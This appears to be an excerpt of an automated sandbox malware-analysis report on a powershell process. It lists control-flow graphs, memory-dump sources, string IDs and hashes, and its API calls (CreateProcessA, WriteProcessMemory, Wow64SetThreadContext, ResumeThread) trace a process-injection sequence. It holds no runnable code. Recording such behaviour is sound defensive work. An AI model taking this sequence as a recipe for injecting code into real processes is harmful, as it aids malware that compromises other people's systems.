2aa83a 10195->10196 10198 2a9c78 WriteProcessMemory 10196->10198 10199 2a9c71 WriteProcessMemory 10196->10199 10197 2aba4d 10197->10053 10198->10197 10199->10197 10201 2aae44 10200->10201 10204 2ac330 2 API calls 10201->10204 10205 2ac340 2 API calls 10201->10205 10202 2aa83a 10206 2a9c78 WriteProcessMemory 10202->10206 10207 2a9c71 WriteProcessMemory 10202->10207 10203 2aba4d 10203->10053 10204->10202 10205->10202 10206->10203 10207->10203 10209 2aa83a 10208->10209 10211 2a9c78 WriteProcessMemory 10209->10211 10212 2a9c71 WriteProcessMemory 10209->10212 10210 2aba4d 10210->10053 10211->10210 10212->10210 10215 2ab36b 10213->10215 10214 2ab3ed 10216 2ac2f8 2 API calls 10215->10216 10217 2ac2a9 2 API calls 10215->10217 10218 2ac2e7 2 API calls 10215->10218 10216->10214 10217->10214 10218->10214 10220 2aa83a 10219->10220 10222 2a9c78 WriteProcessMemory 10220->10222 10223 2a9c71 WriteProcessMemory 10220->10223 10221 2aba4d 10221->10053 10222->10221 10223->10221 10225 2a9cc4 WriteProcessMemory 10224->10225 10227 2a9d63 10225->10227 10227->10081 10229 2a9cc4 WriteProcessMemory 10228->10229 10231 2a9d63 10229->10231 10231->10081 10233 2ac2f9 10232->10233 10248 2a9a18 10233->10248 10252 2a9a20 10233->10252 10234 2ac323 10234->10086 10238 2ac30d 10237->10238 10240 2a9a18 Wow64SetThreadContext 10238->10240 10241 2a9a20 Wow64SetThreadContext 10238->10241 10239 2ac323 10239->10086 10240->10239 10241->10239 10243 2ac2f9 10242->10243 10244 2ac2b2 10242->10244 10246 2a9a18 Wow64SetThreadContext 10243->10246 10247 2a9a20 Wow64SetThreadContext 10243->10247 10244->10086 10245 2ac323 10245->10086 10246->10245 10247->10245 10249 2a9a69 Wow64SetThreadContext 10248->10249 10251 2a9ae7 10249->10251 10251->10234 10253 2a9a69 Wow64SetThreadContext 10252->10253 10255 2a9ae7 10253->10255 10255->10234 10257 2ac355 10256->10257 10266 2a9928 10257->10266 10270 2a9930 10257->10270 10258 2ac368 10258->10122 10262 2ac355 10261->10262 10264 2a9928 ResumeThread 10262->10264 10265 2a9930 ResumeThread 10262->10265 10263 2ac368 10263->10122 10264->10263 10265->10263 10267 2a992d ResumeThread 10266->10267 10269 2a99c6 10267->10269 10269->10258 10271 2a9974 ResumeThread 10270->10271 10273 2a99c6 10271->10273 10273->10258 10275 2aa097 CreateProcessA 10274->10275 10277 2aa2fd 10275->10277 10277->10277 10279 2aa097 10278->10279 10279->10279 10280 2aa28a CreateProcessA 10279->10280 10281 2aa2fd 10280->10281 10281->10281

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 0 411550-41155f 1 411561-41157d 0->1 2 41157f 0->2 3 411581-411583 1->3 2->3 5 411630-41163a 3->5 6 411589-411590 3->6 7 411646-41164c 5->7 8 41163c-411643 5->8 9 411596-41159b 6->9 10 411688-4116d3 6->10 11 411652-41165e 7->11 12 41164e-411650 7->12 14 4115b3-4115c9 9->14 15 41159d-4115a3 9->15 20 4116d9-4116de 10->20 21 41182a-411876 10->21 17 411660-41167b 11->17 12->17 14->10 27 4115cf-4115ef 14->27 18 4115a5 15->18 19 4115a7-4115b1 15->19 18->14 19->14 25 4116e0-4116e6 20->25 26 4116f6-4116fa 20->26 40 4119e3-4119ee 21->40 41 41187c-411881 21->41 29 4116e8 25->29 30 4116ea-4116f4 25->30 31 411700-411702 26->31 32 4117d7-4117e1 26->32 45 4115f5-4115fc 27->45 46 41167e-411683 27->46 29->26 30->26 37 411712 31->37 38 411704-411710 31->38 34 4117e3-4117ec 32->34 35 4117ef-4117f5 32->35 42 4117f7-4117f9 35->42 43 4117fb-411807 35->43 47 411714-411716 37->47 38->47 64 4119f0-4119f6 40->64 65 411a06-411a13 40->65 48 411883-411889 41->48 49 411899-41189d 41->49 50 411809-411827 42->50 43->50 51 411616-41162a 45->51 52 4115fe-411604 45->52 46->45 47->32 54 41171c-411720 47->54 55 41188b 48->55 56 41188d-411897 48->56 57 4118a3-4118a5 49->57 58 411992-41199c 49->58 51->5 62 411606 52->62 63 411608-411614 52->63 67 411740 54->67 68 411722-41173e 54->68 55->49 56->49 59 4118b5 57->59 60 4118a7-4118b3 57->60 69 4119aa-4119b0 58->69 70 41199e-4119a7 58->70 73 4118b7-4118b9 59->73 60->73 62->51 63->51 75 4119f8 64->75 76 4119fa-411a04 64->76 78 411742-411744 67->78 68->78 71 4119b2-4119b4 69->71 72 4119b6-4119c2 69->72 79 4119c4-4119e0 71->79 72->79 73->58 80 4118bf-4118c1 73->80 75->65 76->65 78->32 82 41174a-41174d 78->82 86 4118d1 80->86 87 4118c3-4118cf 80->87 93 411757-41175d 82->93 91 4118d3-4118d5 86->91 87->91 91->58 94 4118db-4118dd 91->94 98 411763-411765 93->98 95 4118f7-4118fb 94->95 96 4118df-4118e5 94->96 101 411915-41198f 95->101 102 4118fd-411903 95->102 99 4118e7 96->99 100 4118e9-4118f5 96->100 103 411767-41176d 98->103 104 41177d-4117d4 98->104 99->95 100->95 105 411905 102->105 106 411907-411913 102->106 107 411771-411773 103->107 108 41176f 103->108 105->101 106->101 107->104 108->104
                  Strings
                  Memory Dump Source
                  • Source File: 0000000A.00000002.473457127.0000000000410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00410000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_410000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'p$4'p$tPp$tPp$$p$$p$$p$$p$$p$$p$[f$[f
                  • API String ID: 0-3827853849
                  • Opcode ID: 0f5bc8db09040f12d05c0e8e352ab256c96bda71602c74bfdf99dc12ac9cd0e6
                  • Instruction ID: 396e62823c8375e4f7351918b6599fdb792c52cd1ec6387c26267c4e32886600
                  • Opcode Fuzzy Hash: 0f5bc8db09040f12d05c0e8e352ab256c96bda71602c74bfdf99dc12ac9cd0e6
                  • Instruction Fuzzy Hash: 25C1F731B043059FDB249B69D850BEBBBE2AFC5310F28806BD6558B361DB79CC82C795

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 115 410b48-410b6b 116 410b71-410b76 115->116 117 410d46-410d72 115->117 118 410b78-410b7e 116->118 119 410b8e-410b92 116->119 127 410d74-410d79 117->127 128 410dbf-410df9 117->128 123 410b80 118->123 124 410b82-410b8c 118->124 120 410cf3-410cfd 119->120 121 410b98-410b9c 119->121 129 410d0b-410d11 120->129 130 410cff-410d08 120->130 125 410baf 121->125 126 410b9e-410bad 121->126 123->119 124->119 131 410bb1-410bb3 125->131 126->131 132 410d91-410da9 127->132 133 410d7b-410d81 127->133 144 410e18 128->144 145 410dfb-410e16 128->145 135 410d13-410d15 129->135 136 410d17-410d23 129->136 131->120 138 410bb9-410bd9 131->138 148 410db7-410dbc 132->148 149 410dab-410dad 132->149 140 410d83 133->140 141 410d85-410d8f 133->141 137 410d25-410d43 135->137 136->137 162 410bf8 138->162 163 410bdb-410bf6 138->163 140->132 141->132 146 410e1a-410e1c 144->146 145->146 152 410e22-410e26 146->152 153 410eaa-410eb4 146->153 149->148 152->153 155 410e2c-410e49 152->155 156 410ec0-410ec6 153->156 157 410eb6-410ebd 153->157 169 410ef9-410efe 155->169 170 410e4f-410e51 155->170 160 410ec8-410eca 156->160 161 410ecc-410ed8 156->161 166 410eda-410ef6 160->166 161->166 167 410bfa-410bfc 162->167 163->167 167->120 168 410c02-410c04 167->168 173 410c14 168->173 174 410c06-410c12 168->174 169->170 175 410e53-410e59 170->175 176 410e6b-410e80 170->176 179 410c16-410c18 173->179 174->179 180 410e5b 175->180 181 410e5d-410e69 175->181 187 410f03-410f7d 176->187 188 410e86-410ea4 176->188 179->120 183 410c1e-410c3e 179->183 180->176 181->176 194 410c40-410c46 183->194 195 410c56-410c5a 183->195 188->153 197 410c48 194->197 198 410c4a-410c4c 194->198 199 410c74-410c78 195->199 200 410c5c-410c62 195->200 197->195 198->195 203 410c7f-410c81 199->203 201 410c64 200->201 202 410c66-410c72 200->202 201->199 202->199 206 410c83-410c89 203->206 207 410c99-410cf0 203->207 208 410c8b 206->208 209 410c8d-410c8f 206->209 208->207 209->207
                  Strings
                  Memory Dump Source
                  • Source File: 0000000A.00000002.473457127.0000000000410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00410000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_410000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 0;-$0;-$4'p$4'p$x;-$$p$$p$$p
                  • API String ID: 0-1362536771
                  • Opcode ID: 08e457d8acce6040c5d0cc7827be66fcb71a2a19b749197746ccfa8f6fd42338
                  • Instruction ID: c79643cf0b4ed20b01ab06f915e41d9c0252d5a8e81334a67199b6d7890bd8ca
                  • Opcode Fuzzy Hash: 08e457d8acce6040c5d0cc7827be66fcb71a2a19b749197746ccfa8f6fd42338
                  • Instruction Fuzzy Hash: 4BC117347043049FDB19DB68D850AAABBA2EFC5310F28846BD449CB355DBB5DCC2CB66

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 214 412de1-412de5 216 412de7-412e09 214->216 217 412e58-412e5d 214->217 218 412e75-412e79 217->218 219 412e5f-412e65 217->219 220 412fa4-412fae 218->220 221 412e7f-412e83 218->221 223 412e67 219->223 224 412e69-412e73 219->224 225 412fb0-412fb9 220->225 226 412fbc-412fc2 220->226 227 412ec3 221->227 228 412e85-412e96 221->228 223->218 224->218 229 412fc4-412fc6 226->229 230 412fc8-412fd4 226->230 232 412ec5-412ec7 227->232 237 412ffc-41304b 228->237 238 412e9c-412ea1 228->238 235 412fd6-412ff9 229->235 230->235 232->220 236 412ecd-412ed1 232->236 236->220 240 412ed7-412edb 236->240 250 413051-413056 237->250 251 41324e-41325e 237->251 241 412ea3-412ea9 238->241 242 412eb9-412ec1 238->242 240->220 244 412ee1-412f07 240->244 245 412eab 241->245 246 412ead-412eb7 241->246 242->232 244->220 263 412f0d-412f11 244->263 245->242 246->242 253 413058-41305e 250->253 254 41306e-413072 250->254 259 413060 253->259 260 413062-41306c 253->260 255 4131f7-413201 254->255 256 413078-41307a 254->256 264 413203-41320a 255->264 265 41320d-413213 255->265 261 41308a 256->261 262 41307c-413088 256->262 259->254 260->254 266 41308c-41308e 261->266 262->266 268 412f13-412f1c 263->268 269 412f34 263->269 270 413215-413217 265->270 271 413219-413225 265->271 266->255 272 413094-4130b3 266->272 273 412f23-412f30 268->273 274 412f1e-412f21 268->274 276 412f37-412f44 269->276 275 413227-41324b 270->275 271->275 286 4130c3 272->286 287 4130b5-4130c1 272->287 277 412f32 273->277 274->277 282 412f4a-412fa1 276->282 277->276 288 4130c5-4130c7 286->288 287->288 288->255 289 4130cd-4130d1 288->289 289->255 290 4130d7-4130db 289->290 291 4130dd-4130ec 290->291 292 4130ee 290->292 293 4130f0-4130f2 291->293 292->293 293->255 294 4130f8-4130fc 293->294 294->255 295 413102-413121 294->295 298 413123-413129 295->298 299 413139-413144 295->299 300 41312b 298->300 301 41312d-41312f 298->301 302 413153-41316f 299->302 303 413146-413149 299->303 300->299 301->299 304 413171-413184 302->304 305 41318c-413196 302->305 303->302 304->305 306 413198 305->306 307 41319a-4131e8 305->307 308 4131ed-4131f4 306->308 307->308
                  Strings
                  Memory Dump Source
                  • Source File: 0000000A.00000002.473457127.0000000000410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00410000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_410000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: (op$(op$L4p$L4p$L4p
                  • API String ID: 0-2509652690
                  • Opcode ID: f0dc98b2c7c91ca5acd20b018f51d15692f472cddc91be5caa96ac9f805e141b
                  • Instruction ID: fb1ae06c54b4814c22a2e437729a008150b6d8fd59de90a1195b83db1579e385
                  • Opcode Fuzzy Hash: f0dc98b2c7c91ca5acd20b018f51d15692f472cddc91be5caa96ac9f805e141b
                  • Instruction Fuzzy Hash: BEB1E235700204EFDF198E68D840BEA7BB2EF85311F14846BE9058B395CBB9CD96CB56

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 315 411290-4112a2 316 411362-4113dc 315->316 317 4112a8-4112b9 315->317 337 411409-41140e 316->337 338 4113de-4113ec 316->338 320 4112d3-4112f0 317->320 321 4112bb-4112c1 317->321 320->316 327 4112f2-411314 320->327 323 4112c3 321->323 324 4112c5-4112d1 321->324 323->320 324->320 331 411316-41131c 327->331 332 41132e-411346 327->332 333 411320-41132c 331->333 334 41131e 331->334 339 411354-41135f 332->339 340 411348-41134a 332->340 333->332 334->332 337->338 344 4113f4-411403 338->344 340->339 344->337
                  Strings
                  Memory Dump Source
                  • Source File: 0000000A.00000002.473457127.0000000000410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00410000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_410000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 89-$\9-$\9-$tPp$tPp
                  • API String ID: 0-1725704517
                  • Opcode ID: 5fa9c6a58b39eb9a36cce695bae041586bfd9c6cd8c0755264c8cc2b8797a5e5
                  • Instruction ID: a102e72309cef9c19713dc83b784ea39c3c0ea9516caa74f87b51cdf934b16e2
                  • Opcode Fuzzy Hash: 5fa9c6a58b39eb9a36cce695bae041586bfd9c6cd8c0755264c8cc2b8797a5e5
                  • Instruction Fuzzy Hash: FD412730B043549FD7249B68C811BAEBFB2AF85700F58805BEA84DF396CA71CC41C7A2

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 363 411374-4113dc 368 411409-41140e 363->368 369 4113de-4113ec 363->369 368->369 372 4113f4-411403 369->372 372->368
                  Strings
                  Memory Dump Source
                  • Source File: 0000000A.00000002.473457127.0000000000410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00410000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_410000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: \9-$\9-
                  • API String ID: 0-1653661471
                  • Opcode ID: a5af559674245efdc500bdf430938d2cdfa2b13e89e704e109106d0f6cbd582b
                  • Instruction ID: 52a34c9161652adfd6b21344eafe015b0716c538ca044478981dca58b0b8d908
                  • Opcode Fuzzy Hash: a5af559674245efdc500bdf430938d2cdfa2b13e89e704e109106d0f6cbd582b
                  • Instruction Fuzzy Hash: 7E0142707043446BD76057308826BAE2FB2CF86B00F48401BFA46CF3D6DAB18C86872A

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 396 41298f-4129a7 398 4129ae-4129b0 396->398 399 4129b2-4129b8 398->399 400 4129c8-412a1f 398->400 402 4129ba 399->402 403 4129bc-4129be 399->403 402->400 403->400
                  Strings
                  Memory Dump Source
                  • Source File: 0000000A.00000002.473457127.0000000000410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00410000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_410000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'p$4'p
                  • API String ID: 0-3973980265
                  • Opcode ID: 1274cd7d2c48e874ef47a0b4963134d19ec588bf31eed76c5b951f01f26fb5a4
                  • Instruction ID: 4792d0d667103ec7fef6e0c589bbe73fcfe4c46ab2bfd0dfa5d7557b9f10a8c6
                  • Opcode Fuzzy Hash: 1274cd7d2c48e874ef47a0b4963134d19ec588bf31eed76c5b951f01f26fb5a4
                  • Instruction Fuzzy Hash: B0E0D8B17043409EDB196668A1213ED7B617FD2360F64809BC480D6345CAA88D76C3A7

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 404 2aa005-2aa0a9 406 2aa0ab-2aa0c2 404->406 407 2aa0f2-2aa11a 404->407 406->407 412 2aa0c4-2aa0c9 406->412 410 2aa11c-2aa130 407->410 411 2aa160-2aa1b6 407->411 410->411 419 2aa132-2aa137 410->419 421 2aa1b8-2aa1cc 411->421 422 2aa1fc-2aa2fb CreateProcessA 411->422 413 2aa0cb-2aa0d5 412->413 414 2aa0ec-2aa0ef 412->414 416 2aa0d9-2aa0e8 413->416 417 2aa0d7 413->417 414->407 416->416 420 2aa0ea 416->420 417->416 423 2aa15a-2aa15d 419->423 424 2aa139-2aa143 419->424 420->414 421->422 429 2aa1ce-2aa1d3 421->429 440 2aa2fd-2aa303 422->440 441 2aa304-2aa3ed 422->441 423->411 426 2aa147-2aa156 424->426 427 2aa145 424->427 426->426 430 2aa158 426->430 427->426 431 2aa1f6-2aa1f9 429->431 432 2aa1d5-2aa1df 429->432 430->423 431->422 434 2aa1e3-2aa1f2 432->434 435 2aa1e1 432->435 434->434 436 2aa1f4 434->436 435->434 436->431 440->441 452 2aa3ef-2aa3f3 441->452 453 2aa3fd-2aa401 441->453 452->453 454 2aa3f5 452->454 455 2aa403-2aa407 453->455 456 2aa411-2aa415 453->456 454->453 455->456 457 2aa409 455->457 458 2aa417-2aa41b 456->458 459 2aa425-2aa429 456->459 457->456 458->459 460 2aa41d 458->460 461 2aa42b-2aa454 459->461 462 2aa45f-2aa46a 459->462 460->459 461->462 466 2aa46b 462->466 466->466
                  APIs
                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 002AA2DF
                  Memory Dump Source
                  • Source File: 0000000A.00000002.473352076.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_2a0000_powershell.jbxd
                  Similarity
                  • API ID: CreateProcess
                  • String ID:
                  • API String ID: 963392458-0
                  • Opcode ID: 736240b8d2bbd66b3a1952234b6a1d8cca3ac26808bc8158487e4190a30af52c
                  • Instruction ID: ce123bf52fd4be418ac6f4a2d9dc5a96447fe3e8189f8cd7430da04762f3d463
                  • Opcode Fuzzy Hash: 736240b8d2bbd66b3a1952234b6a1d8cca3ac26808bc8158487e4190a30af52c
                  • Instruction Fuzzy Hash: A8C14871D102198FDF25CFA8C8457EEBBB1BF0A304F0091AAD859B7250DB749A95CF85

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 467 2aa010-2aa0a9 469 2aa0ab-2aa0c2 467->469 470 2aa0f2-2aa11a 467->470 469->470 475 2aa0c4-2aa0c9 469->475 473 2aa11c-2aa130 470->473 474 2aa160-2aa1b6 470->474 473->474 482 2aa132-2aa137 473->482 484 2aa1b8-2aa1cc 474->484 485 2aa1fc-2aa2fb CreateProcessA 474->485 476 2aa0cb-2aa0d5 475->476 477 2aa0ec-2aa0ef 475->477 479 2aa0d9-2aa0e8 476->479 480 2aa0d7 476->480 477->470 479->479 483 2aa0ea 479->483 480->479 486 2aa15a-2aa15d 482->486 487 2aa139-2aa143 482->487 483->477 484->485 492 2aa1ce-2aa1d3 484->492 503 2aa2fd-2aa303 485->503 504 2aa304-2aa3ed 485->504 486->474 489 2aa147-2aa156 487->489 490 2aa145 487->490 489->489 493 2aa158 489->493 490->489 494 2aa1f6-2aa1f9 492->494 495 2aa1d5-2aa1df 492->495 493->486 494->485 497 2aa1e3-2aa1f2 495->497 498 2aa1e1 495->498 497->497 499 2aa1f4 497->499 498->497 499->494 503->504 515 2aa3ef-2aa3f3 504->515 516 2aa3fd-2aa401 504->516 515->516 517 2aa3f5 515->517 518 2aa403-2aa407 516->518 519 2aa411-2aa415 516->519 517->516 518->519 520 2aa409 518->520 521 2aa417-2aa41b 519->521 522 2aa425-2aa429 519->522 520->519 521->522 523 2aa41d 521->523 524 2aa42b-2aa454 522->524 525 2aa45f-2aa46a 522->525 523->522 524->525 529 2aa46b 525->529 529->529
                  APIs
                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 002AA2DF
                  Memory Dump Source
                  • Source File: 0000000A.00000002.473352076.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_2a0000_powershell.jbxd
                  Similarity
                  • API ID: CreateProcess
                  • String ID:
                  • API String ID: 963392458-0
                  • Opcode ID: e2e41f21920d90560b79dfbc1fcef3c0e1c0d93572408d0ef5577a837d295126
                  • Instruction ID: 22ae45caec2140a08c1b0ee21e33c5375860e7d415444d6587765b1f98969994
                  • Opcode Fuzzy Hash: e2e41f21920d90560b79dfbc1fcef3c0e1c0d93572408d0ef5577a837d295126
                  • Instruction Fuzzy Hash: D8C12771D102199FCF25CFA8C845BEEBBB1BF0A304F0091AAD859B7250DB749A95CF85

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 541 2a9c78-2a9ce3 543 2a9cfa-2a9d61 WriteProcessMemory 541->543 544 2a9ce5-2a9cf7 541->544 546 2a9d6a-2a9dbc 543->546 547 2a9d63-2a9d69 543->547 544->543 547->546
                  APIs
                  • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 002A9D4B
                  Memory Dump Source
                  • Source File: 0000000A.00000002.473352076.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_2a0000_powershell.jbxd
                  Similarity
                  • API ID: MemoryProcessWrite
                  • String ID:
                  • API String ID: 3559483778-0
                  • Opcode ID: d721a194852f42e765d234764b624d930e6832f0cf1c50c71784a4b1cfca30a4
                  • Instruction ID: fac1a2472f418593eb87b4fd73883f6469d867046ed3f5cd693f611f4e51a0b8
                  • Opcode Fuzzy Hash: d721a194852f42e765d234764b624d930e6832f0cf1c50c71784a4b1cfca30a4
                  • Instruction Fuzzy Hash: 8341ACB4D002589FCF00CFA9D984AEEFBF1BB49314F20902AE814BB250D775AA55CF64

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 530 2a9c71-2a9ce3 532 2a9cfa-2a9d61 WriteProcessMemory 530->532 533 2a9ce5-2a9cf7 530->533 535 2a9d6a-2a9dbc 532->535 536 2a9d63-2a9d69 532->536 533->532 536->535
                  APIs
                  • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 002A9D4B
                  Memory Dump Source
                  • Source File: 0000000A.00000002.473352076.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_2a0000_powershell.jbxd
                  Similarity
                  • API ID: MemoryProcessWrite
                  • String ID:
                  • API String ID: 3559483778-0
                  • Opcode ID: f6b93522362f452881c3d0a963faaff58f6e01c97e90528c91a8f6bf8df9a24f
                  • Instruction ID: ed5818c45b657cc552b9863fdd467e296b54ece465a662ea04e15d154c8c2336
                  • Opcode Fuzzy Hash: f6b93522362f452881c3d0a963faaff58f6e01c97e90528c91a8f6bf8df9a24f
                  • Instruction Fuzzy Hash: D041BCB4D002489FCF00CFA9D984AEEFBF1BB49314F20902AE814BB210D734AA55CF64

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 552 2a9a18-2a9a80 554 2a9a82-2a9a94 552->554 555 2a9a97-2a9ae5 Wow64SetThreadContext 552->555 554->555 557 2a9aee-2a9b3a 555->557 558 2a9ae7-2a9aed 555->558 558->557
                  APIs
                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 002A9ACF
                  Memory Dump Source
                  • Source File: 0000000A.00000002.473352076.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_2a0000_powershell.jbxd
                  Similarity
                  • API ID: ContextThreadWow64
                  • String ID:
                  • API String ID: 983334009-0
                  • Opcode ID: e59c36aa8e2b3b420c558439a26045cc04c6549807d101339ee2ceb08f335bab
                  • Instruction ID: 99544c4412c63063397e0a91d839c6894416a0dcd1516df522ea90464618605d
                  • Opcode Fuzzy Hash: e59c36aa8e2b3b420c558439a26045cc04c6549807d101339ee2ceb08f335bab
                  • Instruction Fuzzy Hash: 2741B0B4D002599FCF10CFA9D584AEEFBB1BF49314F14842AE414B7250D7749945CF54

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 563 2a9a20-2a9a80 565 2a9a82-2a9a94 563->565 566 2a9a97-2a9ae5 Wow64SetThreadContext 563->566 565->566 568 2a9aee-2a9b3a 566->568 569 2a9ae7-2a9aed 566->569 569->568
                  APIs
                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 002A9ACF
                  Memory Dump Source
                  • Source File: 0000000A.00000002.473352076.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_2a0000_powershell.jbxd
                  Similarity
                  • API ID: ContextThreadWow64
                  • String ID:
                  • API String ID: 983334009-0
                  • Opcode ID: 562eb25f5246e130a1f9db2361e2cd9f52f3cffe90d1012cc22cb0fd0ff7f547
                  • Instruction ID: 9426e6e0f354824748ee9e301386267676d35517eafa02db30c5ca40e664e456
                  • Opcode Fuzzy Hash: 562eb25f5246e130a1f9db2361e2cd9f52f3cffe90d1012cc22cb0fd0ff7f547
                  • Instruction Fuzzy Hash: 1241ADB4D102599FCF10CFAAD984AEEFBB1AB49314F24842AE414B7240D778A985CF54

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 574 2a9928-2a99c4 ResumeThread 578 2a99cd-2a9a0f 574->578 579 2a99c6-2a99cc 574->579 579->578
                  APIs
                  • ResumeThread.KERNELBASE(?), ref: 002A99AE
                  Memory Dump Source
                  • Source File: 0000000A.00000002.473352076.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_2a0000_powershell.jbxd
                  Similarity
                  • API ID: ResumeThread
                  • String ID:
                  • API String ID: 947044025-0
                  • Opcode ID: 8a466e8a5e616fe4485571a8788e3b7049910b32b2db647819872c0cada8b516
                  • Instruction ID: a143aa870116c3366347961c2018c88aed8d5ff06ac6db8d5af5ad7ad62ba698
                  • Opcode Fuzzy Hash: 8a466e8a5e616fe4485571a8788e3b7049910b32b2db647819872c0cada8b516
                  • Instruction Fuzzy Hash: EF31FCB4D10219AFCF10CFAAD984AEEFBB0AF49324F10852AE814B7350C775A945CF94
                  APIs
                  • ResumeThread.KERNELBASE(?), ref: 002A99AE
                  Memory Dump Source
                  • Source File: 0000000A.00000002.473352076.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_2a0000_powershell.jbxd
                  Similarity
                  • API ID: ResumeThread
                  • String ID:
                  • API String ID: 947044025-0
                  • Opcode ID: 6d6d9e1f80c6c0febc8049eefa143315af58c6ac766c6ffa56b59a65c043ce18
                  • Instruction ID: 1383f2e7dd9e6b0cee27c26d690d8048489aca53d35e0f8c1c1a4749792834d0
                  • Opcode Fuzzy Hash: 6d6d9e1f80c6c0febc8049eefa143315af58c6ac766c6ffa56b59a65c043ce18
                  • Instruction Fuzzy Hash: 0F31BAB4D10219AFCF10CFAAD984AAEFBB5AF49314F14942AE818B7310C775A945CF94
                  Strings
                  Memory Dump Source
                  • Source File: 0000000A.00000002.473457127.0000000000410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00410000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_410000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: (op
                  • API String ID: 0-3117038
                  • Opcode ID: 51df61eb148369c350ee0dc6f79665d29e5a098d7c051d8f381b1d87ad5a525c
                  • Instruction ID: b85c4e6c2daaf971a72597e8f308ada7fc6a043e38f37fc2aeca8a69f381cc92
                  • Opcode Fuzzy Hash: 51df61eb148369c350ee0dc6f79665d29e5a098d7c051d8f381b1d87ad5a525c
                  • Instruction Fuzzy Hash: D2318C30604345DFCB288E24CA44BEABB71FF55315F14846BE455CA2A2C7F99CE2DB4A
                  Strings
                  Memory Dump Source
                  • Source File: 0000000A.00000002.473457127.0000000000410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00410000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_410000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'p
                  • API String ID: 0-481844870
                  • Opcode ID: 60ec0da109693c938634807b92830d0ec5ddce21d6cf5141ced5f8a4572d739b
                  • Instruction ID: 30b051b884e2fead76dcaf65cf7b92921a3b5c1116840b4da935b0ab74a72e69
                  • Opcode Fuzzy Hash: 60ec0da109693c938634807b92830d0ec5ddce21d6cf5141ced5f8a4572d739b
                  • Instruction Fuzzy Hash: 6C218E31A002048FCB54DF29C4446EEBBE1AF84351F288067D614877A0D739CDC2CBA9
                  Memory Dump Source
                  • Source File: 0000000A.00000002.473285744.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_1dd000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b68e62ec84de3d56a2d7baf68b9ad985b75d4ee03cf596e79ac6a6f63b59c1e6
                  • Instruction ID: 8889f98fff8d0047c3e49003271582cbbccc359b3fcb946320ce387bdac513b7
                  • Opcode Fuzzy Hash: b68e62ec84de3d56a2d7baf68b9ad985b75d4ee03cf596e79ac6a6f63b59c1e6
